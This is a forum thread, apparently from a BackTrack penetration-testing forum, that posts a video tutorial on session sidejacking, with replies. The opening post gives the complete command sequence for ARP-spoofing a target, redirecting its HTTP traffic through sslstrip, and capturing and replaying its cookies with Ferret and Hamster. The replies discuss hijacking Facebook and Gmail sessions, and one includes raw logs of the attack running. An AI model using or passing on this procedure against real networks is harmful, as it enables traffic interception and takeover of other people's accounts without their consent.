[Video] Session Sidejacking (Ferret and Hamster)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
Download video: http://www.mediafire.com/?3pz9w85jd4s328q
What is this?
This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!
What do I need?
> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*
Software
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: sslstrip
Version: 0.6
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
Name: Hamster Sidejacking Tool
Version: 2.0
Home Page: http://hamster.erratasec.com/
Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z
Commands:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster
Notes:
Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
Video length: 2:39
Capture length: 3:42
Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html
Re: [Video] Session Sidejacking (Ferret and Hamster)
Great video, thank you for posting this. I am very interested in trying this out myself.
Well done!
Re: [Video] Session Sidejacking (Ferret and Hamster)
Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks
Re: [Video] Session Sidejacking (Ferret and Hamster)
What software do you use for creating the videos ?
Re: [Video] Session Sidejacking (Ferret and Hamster)
Thanks for sharing, great video, keep going.
Re: [Video] Session Sidejacking (Ferret and Hamster)
I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.
Any ideas? Is gmail not allowing unencrypted logins now?
Re: [Video] Session Sidejacking (Ferret and Hamster)
Quote:
Originally Posted by
freemymind
Great video, thank you for posting this. I am very interested in trying this out myself.
Well done!
Quote:
Originally Posted by
Thunder-R
Thanks for sharing, great video, keep going.
Thanks for the thanks
Quote:
Originally Posted by
A Student
Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks
Yep. Works for me. Try again?
Quote:
Originally Posted by
CyberGod
What software do you use for creating the videos ?
Camtasia Studio
Quote:
Originally Posted by
Bandito
I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.
Any ideas? Is gmail not allowing unencrypted logins now?
Try SSLStrip.
Re: [Video] Session Sidejacking (Ferret and Hamster)
g0tmilk any idea why i get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when i run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?
Re: [Video] Session Sidejacking (Ferret and Hamster)
Quote:
Originally Posted by
kenv202
g0tmilk any idea why i get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when i run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?
Nope.
Could change your setup, so it could do a test over eth0 and see if it works that way?
Using a Live CD of backtrack? Installed? Updated backtrack at all?
Re: [Video] Session Sidejacking (Ferret and Hamster)
Quote:
Originally Posted by
g0tmi1k
Nope.
Could change your setup, so it could do a test over eth0 and see if it works that way?
Using a Live CD of backtrack? Installed? Updated backtrack at all?
hi sorry for the late reply, i am using persistent live cd BT4 final, i have updated everything recently using the apt-get cmd
i fixed the LLC error by changing to my alfa card rather then using my internal wireless card..
here is my log:
1st window:
echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
2nd window:
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~# sslstrip -p -k -f
sslstrip 0.6 by Moxie Marlinspike running...
3rd window: (this is where it starts going wrong i think)
-- Sniffing on interface "wlan1"
SNIFFING: wlan1
LINKTYPE: 1 Ethernet
ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
Traffic seen
ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"
4th window :
root@bt:~# /pentest/sniffers/hamster/hamster
--- HAMPSTER 2.0 side-jacking tool ---
begining thread
Set browser to use proxy BackTrack Linux
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
GET /StreamReceiver/services
GET /StreamReceiver/services HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: rcv-srv22.inplay.tubemogul.com
Connection: close
Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8
recv failed: Connection reset by peer
recv failed: Connection reset by peer
i have no idea why it says recv failed: Connection reset by peer...
basically once i got hamster up n running, i proceed to using my 2nd laptop which uses windows 7, i used firefox to log into my gmail account.. then refreshed conquer on my BT4 machine but didnt see the log for that computer in kronquer..
(yes both of my computer r connected to the same network)
hope u can help =)
